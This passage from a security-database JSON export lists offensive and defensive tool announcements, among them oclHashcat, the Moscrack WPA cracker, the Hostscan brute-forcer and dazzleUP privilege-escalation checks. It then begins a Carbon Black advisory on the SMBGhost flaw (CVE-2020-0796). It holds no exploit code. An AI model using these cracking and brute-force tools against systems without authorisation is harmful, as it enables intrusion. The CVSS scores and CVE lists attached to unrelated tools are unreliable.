sha256crypt \n * sha512crypt \n * DES(Unix) \n * MD5(Unix) \n * SHA256(Unix) \n * SHA512(Unix) \n * OSX v10.4 \n * OSX v10.5 \n * OSX v10.6 \n * OSX v10.7 \n * OSX v10.8 \n * OSX v10.9 \n * Cisco-ASA \n * Cisco-IOS \n * Cisco-PIX \n * GRUB 2 \n * Juniper Netscreen/SSG (ScreenOS) \n * RACF \n * Samsung Android Password/PIN \n * MSSQL \n * MySQL \n * Oracle \n * Postgres \n * Sybase \n * DNSSEC (NSEC3) \n * IKE-PSK \n * IPMI2 RAKP \n * iSCSI CHAP \n * WPA \n * WPA2 \n * 1Password, cloudkeychain \n * 1Password, agilekeychain \n * Lastpass \n * Password Safe SHA-256 \n * TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 + AES \n * TrueCrypt 5.0+ PBKDF2 HMAC-SHA512 + AES \n * TrueCrypt 5.0+ PBKDF2 HMAC-Whirlpool + AES \n * TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 + AES + boot-mode \n * TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 + AES + hidden-volume \n * TrueCrypt 5.0+ PBKDF2 HMAC-SHA512 + AES + hidden-volume \n * TrueCrypt 5.0+ PBKDF2 HMAC-Whirlpool + AES + hidden-volume \n * TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 + AES + hidden-volume + boot-mode \n * SAP CODVN B (BCODE) \n * SAP CODVN F/G (PASSCODE) \n * Citrix Netscaler \n * Netscape LDAP SHA/SSHA \n * Apache MD5-APR \n * hMailServer \n * EPiServer \n * Drupal \n * IPB \n * Joomla \n * MyBB \n * osCommerce \n * Redmine \n * SMF \n * vBulletin \n * Woltlab Burning Board \n * xt:Commerce \n * WordPress \n * phpBB3 \n * Half MD5 (left, mid, right) \n * Double MD5 \n * Double SHA1 \n * md5($pass.$salt) \n * md5($salt.$pass) \n * md5(unicode($pass).$salt) \n * md5($salt.unicode($pass)) \n * md5(sha1($pass)) \n * sha1($pass.$salt) \n * sha1($salt.$pass) \n * sha1(unicode($pass).$salt) \n * sha1($salt.unicode($pass)) \n * sha1(md5($pass)) \n * sha256($pass.$salt) \n * sha256($salt.$pass) \n * sha256(unicode($pass).$salt) \n * sha256($salt.unicode($pass)) \n * sha512($pass.$salt) \n * sha512($salt.$pass) \n * sha512(unicode($pass).$salt) \n * sha512($salt.unicode($pass)) \n\n \n\n\n** [ Download oclHashcat v1.21 ](<https://hashcat.net/oclhashcat/>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-28T04:05:25", "type": "kitploit", "title": "oclHashcat v1.2 - GPGPU-based Multi-hash Cracker", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-28T04:05:25", "id": "KITPLOIT:1370442080181927541", "href": "http://www.kitploit.com/2014/05/oclhashcat-v12-gpgpu-based-multi-hash.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T10:53:49", "description": "[ ![](https://2.bp.blogspot.com/-J630bGpPYLQ/U4P9lgOY__I/AAAAAAAACh0/aafifcpsaYA/s1600/Moscrack.jpg) ](<https://2.bp.blogspot.com/-J630bGpPYLQ/U4P9lgOY__I/AAAAAAAACh0/aafifcpsaYA/s1600/Moscrack.jpg>)\n\n \n\n\nMoscrack is a PERL application designed to facilitate cracking WPA keys in parallel on a group of computers. This is accomplished by use of either Mosix clustering software, SSH or RSH access to a number of nodes. With Moscrack\u2019s new plugin framework, hash cracking has become possible. SHA256/512, DES, MD5 and *Blowfish Unix password hashes can all be processed with the Dehasher Moscrack plugin. \n\n \n\n\n** Features **\n\n * Basic API allows remote monitoring \n * Automatic and dynamic configuration of nodes \n * Live CD/USB enables boot and forget dynamic node configuration \n * Uses aircrack-ng (including 1.2 Beta) by default \n * CUDA/OpenCL support via Pyrit plugin \n * CUDA support via aircrack-ng-cuda (untested) \n * Does not require an agent/daemon on nodes \n * Can crack/compare SHA256/512, DES, MD5 and blowfish hashes via Dehasher plugin \n * Supports mixed OS/protocol configurations \n * Supports SSH, RSH, Mosix for node connectivity \n * Effectively handles mixed fast and slow nodes or links \n * Supports Mosix clustering software \n * Nodes can be added/removed/modified while Moscrack is running \n * Failed/bad node throttling \n * Hung node detection \n * Reprocessing of data on error \n\n \n\n\n[ ** Download Moscrack ** ](<https://sourceforge.net/projects/moscrack/>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-27T02:53:56", "type": "kitploit", "title": "Moscrack - Cluster Cracking Tool For WPA Keys", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-27T02:53:56", "id": "KITPLOIT:6298886136201302065", "href": "http://www.kitploit.com/2014/05/moscrack-cluster-cracking-tool-for-wpa.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T04:42:52", "description": "[ ![](https://2.bp.blogspot.com/-mcKh5FsT0pk/U4eydvAKLLI/AAAAAAAACig/H1mOgCfStMk/s1600/hostscan.png) ](<https://2.bp.blogspot.com/-mcKh5FsT0pk/U4eydvAKLLI/AAAAAAAACig/H1mOgCfStMk/s1600/hostscan.png>)\n\n \n \n\n\nHostscan is a php tool which allows you to scan specific range of hosts, mostly for information gathering and testing for weak passwords. I guess it's a pentest tool, i'd created it to automate some tests that i often do. Since it's PHP, it works quite slowly compared to client-side soft. \n\n \n\n\n** How it works? **\n\n * You need to provide range of ip's (e.g. 127.0.0.1 - 127.0.0.10); program will perform operations on each address separately, basing on selected options, then it will print out the response. \n * By default, program will only check open ports, print http response headers, test for HTTP methods and check FTP for anonymous login. \n * If 'SSH/IMAP/DB's' are checked, program will try to bruteforce SSH,IMAP,MySQL,PostgreSQL & MsSQL using array of passwords and users defined on the beggining of script. Notice, that it will try to login as user with grand permissions (e.g. root, postgres), although you're able to edit it. \n * If 'FTP User' is set, program will also try to bruteforce FTP with specific user using mentioned passwords array. By default it's not, and it will only test for anonymous login. \n * If 'Deep Scan' is set, program will perform all aforementioned operations. Further, it will use nmap with specific parameters you're able to edit, also, the traceroute scan will be performed and displayed - just like nmap. Deep Scan also gather some useful informations about a website (if it's running), such as interesting files/folders and www title. \n * ?url=website.com for quick IP address of specific website. \n\n...so - what it does it do? Nmap, traceroute, port scan, ftp anonymous login, ftp/ssh/imap/mysql/pgsql/mssql bruteforce, http (website) info gathering, \n\nCrawler accepts as a parameter array of files and folders that you can manually edit, just like others options. \n\n \n\n\n[ ** Download Hostscan ** ](<https://github.com/Smaash/hostscan/>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-29T22:21:37", "type": "kitploit", "title": "Hostscan - PHP tool for scanning specific range of hosts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-29T22:21:37", "id": "KITPLOIT:4378915690459298496", "href": "http://www.kitploit.com/2014/05/hostscan-php-tool-for-scanning-specific.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T10:50:14", "description": "[ ![](https://3.bp.blogspot.com/-3zjRJe6jin0/U4Pgn6dRGBI/AAAAAAAAChk/UdGvCemlSXs/s1600/comparison_why_is_YaCy_better_en.png) ](<https://3.bp.blogspot.com/-3zjRJe6jin0/U4Pgn6dRGBI/AAAAAAAAChk/UdGvCemlSXs/s1600/comparison_why_is_YaCy_better_en.png>)\n\n** YaCy ** is a free search engine that anyone can use to build a search portal for their intranet or to help search the public internet. When contributing to the world-wide peer network, the scale of YaCy is limited only by the number of users in the world and can index billions of web pages. It is fully decentralized, all users of the search engine network are equal, the network does not store user search requests and it is not possible for anyone to censor the content of the shared index. We want to achieve freedom of information through a free, distributed web search which is powered by the world's users. \n \n\n\nDecentralization \n\nImagine if, rather than relying on the proprietary software of a large professional search engine operator, your search engine was run by many private computers which aren't under the control of any one company or individual. Well, that's what YaCy does! The resulting decentralized web search currently has about 1.4 billion documents in its index (and growing - download and install YaCy to help out!) and more than 600 peer operators contribute each month. About 130,000 search queries are performed with this network each day. \n\n### Live image of the 'freeworld' network \n\n[ ![](http://188.40.64.7:8095/NetworkPicture.png?width=640&height=480&bgcolor=FFFFFF&pal=10080&pol=10080) ](<http://188.40.64.7:8095/NetworkPicture.png?width=640&height=480&bgcolor=FFFFFF&pal=10080&pol=10080> \"YaCy Network\" ) \n\n\n### Installation is easy! \n\nThe installation takes only three minutes. Just download the release, decompress the package and run the start script. On linux you need OpenJDK7. You don't need to install external databases or a web server, everything is already included in YaCy. \n \n\n\n \n\n\n** [ Download YaCy ](<http://yacy.net/en/index.html>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-27T00:52:01", "type": "kitploit", "title": "YaCy - The Peer to Peer Search Engine", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-27T00:52:01", "id": "KITPLOIT:3440136498125856121", "href": "http://www.kitploit.com/2014/05/yacy-peer-to-peer-search-engine.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T08:40:37", "description": "[ ![](https://1.bp.blogspot.com/-3JOJzA3594s/U4ezkuRIfJI/AAAAAAAACis/7HVCtNTZtSs/s1600/Hook+Analyser.jpg) ](<https://1.bp.blogspot.com/-3JOJzA3594s/U4ezkuRIfJI/AAAAAAAACis/7HVCtNTZtSs/s1600/Hook+Analyser.jpg>)\n\n \n \n\n\nHook Analyser is a freeware application which allows an investigator/analyst to perform \u201cstatic & run-time / dynamic\u201d analysis of suspicious applications, also gather (analyse & co-related) threat intelligence related information (or data) from various open sources on the Internet. \n\n \n\n\nEssentially it\u2019s a malware analysis tool that has evolved to add some cyber threat intelligence features & mapping. \n\n \n\n\n \n\n\nHook Analyser is perhaps the only \u201cfree\u201d software in the market which combines analysis of malware analysis and cyber threat intelligence capabilities. The software has been used by major Fortune 500 organisations. \n\n \n\n\n** Features/Functionality **\n\n * Spawn and Hook to Application \u2013 Enables you to spawn an application, and hook into it \n * Hook to a specific running process \u2013 Allows you to hook to a running (active) process \n * Static Malware Analysis \u2013 Scans PE/Windows executables to identify potential malware traces \n * Application crash analysis \u2013 Allows you to analyse memory content when an application crashes \n * Exe extractor \u2013 This module essentially extracts executables from running process/s \n\n \n\n\n** [ Download Hook Analyser 3.1 ](<https://docs.google.com/forms/d/14iXoERDGdatSABiqa66GnKu78Wju49Me2z_h6lUhBHk/viewform>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-29T22:25:44", "type": "kitploit", "title": "Hook Analyser 3.1 - Malware Analysis Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-29T22:25:44", "id": "KITPLOIT:3348929726444940519", "href": "http://www.kitploit.com/2014/05/hook-analyser-31-malware-analysis-tool.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T08:42:41", "description": "[ ![](https://2.bp.blogspot.com/-TgiYlVlHEKY/U31FMimdZBI/AAAAAAAACgo/A-_wV0Q33o8/s1600/w3af.png) ](<https://2.bp.blogspot.com/-TgiYlVlHEKY/U31FMimdZBI/AAAAAAAACgo/A-_wV0Q33o8/s1600/w3af.png>)\n\n** w3af ** , is a Web Application Attack and Audit Framework. The ** w3af ** core and it\u2019s plugins are fully written in python, it identifies more than 200 vulnerabilities and reduce your site\u2019s overall risk exposure. Identify vulnerabilities like SQL Injection, Cross-Site Scripting, Guessable credentials, Unhandled application errors and PHP misconfigurations. \n\n \n\n\n### Changelog v1.6 \n\n * Improved performance: your scans will run faster \n * Improved quality: 1300+ unittests are run after each change to make sure we don\u2019t add any regressions \n * Now you\u2019ll be able to easily integrate w3af into other projects with a simple import w3af \n * [ Better documentation ](<http://docs.w3af.org/>)\n\n \n\n\n** [ Download w3af ](<http://w3af.org/download>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-22T00:33:30", "type": "kitploit", "title": "w3af - Open Source Web Application Security Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-22T00:33:30", "id": "KITPLOIT:3872284907466902606", "href": "http://www.kitploit.com/2014/05/w3af-open-source-web-application.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T08:43:00", "description": "[ ![](https://4.bp.blogspot.com/-KuBdsEHqmS4/U4Km1oGJzEI/AAAAAAAAChI/CctJtTjQS7E/s1600/Logo_Tails-300x154.png) ](<https://4.bp.blogspot.com/-KuBdsEHqmS4/U4Km1oGJzEI/AAAAAAAAChI/CctJtTjQS7E/s1600/Logo_Tails-300x154.png>)\n\n \n\n\n_ ** Tails ** _ , The Amnesic Incognito Live System, is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship almost anywhere you go and on any computer but leaving no trace unless you ask it to explicitly. \n\n \n\n\n \n\n\nIt is a complete operating system designed to be used from a DVD, USB stick, or SD card independently of the computer\u2019s original operating system. It is Free Software and based on Debian GNU/Linux. \n\n \n \n\n\n[ ** Download Tails ** ](<https://tails.boum.org/download/index.en.html>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-26T02:31:36", "type": "kitploit", "title": "Tails - The Amnesic Incognito Live System Released", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-26T02:31:36", "id": "KITPLOIT:6714457792986818120", "href": "http://www.kitploit.com/2014/05/tails-amnesic-incognito-live-system.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T12:02:45", "description": "[![](https://1.bp.blogspot.com/-SLG1VuBq6Fo/XyDlCwNqrdI/AAAAAAAATRo/cKQCSSbfdZIOzU4fmL1R8TEBPBy-AQkMACNcBGAsYHQ/s400/dazzleUP_1_dazzleUP.png)](<https://1.bp.blogspot.com/-SLG1VuBq6Fo/XyDlCwNqrdI/AAAAAAAATRo/cKQCSSbfdZIOzU4fmL1R8TEBPBy-AQkMACNcBGAsYHQ/s1600/dazzleUP_1_dazzleUP.png>)\n\n \n\n\nA tool that detects the [privilege escalation](<https://www.kitploit.com/search/label/Privilege%20Escalation> \"privilege escalation\" ) [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) caused by [misconfigurations](<https://www.kitploit.com/search/label/Misconfigurations> \"misconfigurations\" ) and missing updates in the Windows operating systems. dazzleUP detects the following vulnerabilities. \n \n**Exploit Checks** \nThe first feature of dazzleUP is that it uses Windows Update Agent API instead of WMI (like others) when finding missing patches. dazzleUP checks the following vulnerabilities. \n\n\n * DCOM/NTLM Reflection (Rotten/Juicy Potato) Vulnerability\n * CVE-2019-0836\n * CVE-2019-0841\n * CVE-2019-1064\n * CVE-2019-1130\n * CVE-2019-1253\n * CVE-2019-1385\n * CVE-2019-1388\n * CVE-2019-1405\n * CVE-2019-1315\n * CVE-2020-0787\n * CVE-2020-0796\ndazzleUP do exploit checks when target system is Windows 10 operating system (builds 1809, 1903, 1909 and 2004) that are currently supported by Microsoft. If run on an unsupported operating system; dazzleUP will warn you as \"Target system build number is not supported by dazzleUP, passing missing updates controls ...\". \n \n**Misconfiguration Checks** \ndazzleUP performs the following [misconfiguration](<https://www.kitploit.com/search/label/Misconfiguration> \"misconfiguration\" ) checks for each Windows operating system. \n\n\n * Always Install Elevated\n * Credential enumaration from Credential Manager\n * McAfee's SiteList.xml Files\n * Modifiable binaries saved as Registry AutoRun\n * Modifiable Registry AutoRun Keys\n * Modifiable Service Binaries\n * Modifiable Service Registry Key\n * %PATH% values for DLL Hijack\n * Unattended Install Files\n * Unquoted Service Paths\n \n**Operational Usage - 1** \nYou can use dazzleUP directly using standalone .EXE and get the results. The [screenshot](<https://www.kitploit.com/search/label/Screenshot> \"screenshot\" ) is given below. \n\n\n \n\n\n[![](https://1.bp.blogspot.com/-X0O_RBn-aCM/XyDlLijcRQI/AAAAAAAATRs/_W4WwmrZMaQGkhRoODIbI3QIwfApQLGQACNcBGAsYHQ/s640/dazzleUP_2_standalone_execution.png)](<https://1.bp.blogspot.com/-X0O_RBn-aCM/XyDlLijcRQI/AAAAAAAATRs/_W4WwmrZMaQGkhRoODIbI3QIwfApQLGQACNcBGAsYHQ/s1600/dazzleUP_2_standalone_execution.png>)\n\n**Operational Usage - 2** \nYou can use dazzleUP directly using Reflective DLL version on Cobalt Strike's Beacon using `dazzleUP.cna` file. The screenshot is given below. For more information; <https://www.cobaltstrike.com/aggressor-script/index.html> \n\n\n \n\n\n[![](https://1.bp.blogspot.com/-pYvaONm_nS0/XyDlQC3EoBI/AAAAAAAATRw/mpSsw6MBT4weeWWO1YnAjuMMRuOO7NNDACNcBGAsYHQ/s640/dazzleUP_3_beacon_execution.png)](<https://1.bp.blogspot.com/-pYvaONm_nS0/XyDlQC3EoBI/AAAAAAAATRw/mpSsw6MBT4weeWWO1YnAjuMMRuOO7NNDACNcBGAsYHQ/s1600/dazzleUP_3_beacon_execution.png>)\n\n \n\n\n**[Download dazzleUP](<https://github.com/hlldz/dazzleUP> \"Download dazzleUP\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-31T12:30:00", "type": "kitploit", "title": "dazzleUP - A Tool That Detects The Privilege Escalation Vulnerabilities Caused By Misconfigurations And Missing Updates In The Windows OS", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0836", "CVE-2019-0841", "CVE-2019-1064", "CVE-2019-1130", "CVE-2019-1253", "CVE-2019-1315", "CVE-2019-1385", "CVE-2019-1388", "CVE-2019-1405", "CVE-2020-0787", "CVE-2020-0796"], "modified": "2020-07-31T12:30:06", "id": "KITPLOIT:3701426813255055656", "href": "http://www.kitploit.com/2020/07/dazzleup-tool-that-detects-privilege.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "carbonblack": [{"lastseen": "2020-03-17T19:36:16", "description": "On March 10, 2020 analysis of a SMB vulnerability was inadvertently shared, under the assumption that Microsoft was releasing a patch for that vulnerability (CVE-2020-0796). As of March 12, Microsoft has since released a [patch](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) for CVE-2020-0796, which is a vulnerability specifically affecting SMB3. \n\nSpecifically this vulnerability would allow an unauthenticated attacker to exploit this vulnerability by sending a specially crafted packet to a vulnerable SMBv3 Server. Similarly if an attacker could convince or trick a user into connecting to a malicious SMBv3 Server, then the user\u2019s SMB3 client could also be exploited. Regardless if the target or host is successfully exploited, this would grant the attacker the ability to execute arbitrary code.\n\nIn addition to disabling SMB compression on an impacted server, Microsoft advised blocking any inbound or outbound traffic on TCP port 445 at the perimeter firewall. Additionally the Computer Emergency Response Team Coordination Center (CERT/CC) advised that organizations should verify that SMB connections from the internet _are not allowed to connect inbound to an enterprise LAN_.\n\nMicrosoft has released a patch for this vulnerability last week. You can view and download patches for impacted systems [here](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>). Remember, the compensating controls provided by Microsoft only apply to SMB servers. SMB clients are still impacted by this vulnerability and its critical these patches are applied as soon as possible to limit exposure. \n\nVMware Carbon Black technologies are built with some fundamental Operating System trust principals in mind. From time to time a new attack technique will come along that breaks these trust boundaries. Oftentimes these trust boundaries affect the building blocks of the operating system security model. Sometimes new attack techniques make front page news but it's important to take a step back and not get caught up in the headlines. These techniques, which are part of the exploitation phase, end up being a very small piece in the overall attacker kill chain.\n\nIt is important to remember that these attacks don't happen in isolation. There are a series of steps that occur both before and after initial infection. Regardless of the attackers\u2019 motives or skill levels, the delivery or exploitation that provides them access into a network is just the beginning stages of the overall process. A process that almost always includes additional payloads or tools, privilege escalation or credential access, and lateral movement. And all of this before the attackers can begin to identify and steal the data that they are after. VMware Carbon Black aims to detect portions of the kill-chain that an attacker must pass through in order to achieve these actions and complete their objective. There are a large number of exploit detection techniques within VMware Carbon Black platform as well as hundreds of detection and prevention capabilities across the entire kill-chain. \n\nThe table below lists the known affected Operating System versions, released by Microsoft.\n\n**Windows Server**\n\n| \n\nVersion 1903 (Server Core Installation) \n \n---|--- \n \nVersion 1909 (Server Core Installation) \n \n**Windows 10**\n\n| \n\nVersion 1903 for 32-bit Systems \n \nVersion 1903 for ARM64-based Systems \n \nVersion 1903 for x64-based Systems \n \nVersion 1909 for 32-bit Systems \n \nVersion 1909 for ARM64-based Systems \n \nVersion 1909 for x64-based Systems \n \n**Proactive Measures and Mitigations**\n\nVMware Carbon Black is providing several methods to determine if endpoints or servers in your environment are vulnerable to CVE-2020-0796.\n\n#### **Identification and Mitigation of Affected Systems**\n\nVMware Carbon Black TAU has published a PowerShell script to detect and mitigate EternalDarkness in our public \u2018tau-tools\u2019 github repository: [EternalDarkness](<https://github.com/carbonblack/tau-tools/tree/master/remediation/EternalDarkness>). This script will identify if a machine has active SMB shares, is running an OS version impacted by this vulnerability, and check to see if the disabled compression mitigating keys are set and optionally set mitigating keys. It can be leveraged with any endpoint configuration management tools that support powershell along with LiveResponse. \n\nPowerShell Execution:\n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_1.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_1.png>) \n\n\n_Figure 1: EternalDarkness Powershell output_\n\n**Live Response - Remote Execution**\n\nLeveraging VMware Carbon Black\u2019s LiveResponse API, we can extend the PowerShell script and run this across a fleet of systems remotely. The LiveResponse script is a Python3 wrapper located in the [EternalDarkness](<https://github.com/carbonblack/tau-tools/tree/master/remediation/EternalDarkness>) GitHub repository. EternalDarkness-lR.py uploads the aforementioned PowerShell script and can run checks or implement mitigations depending the options provided at run-time, across the full VMware Carbon Black product 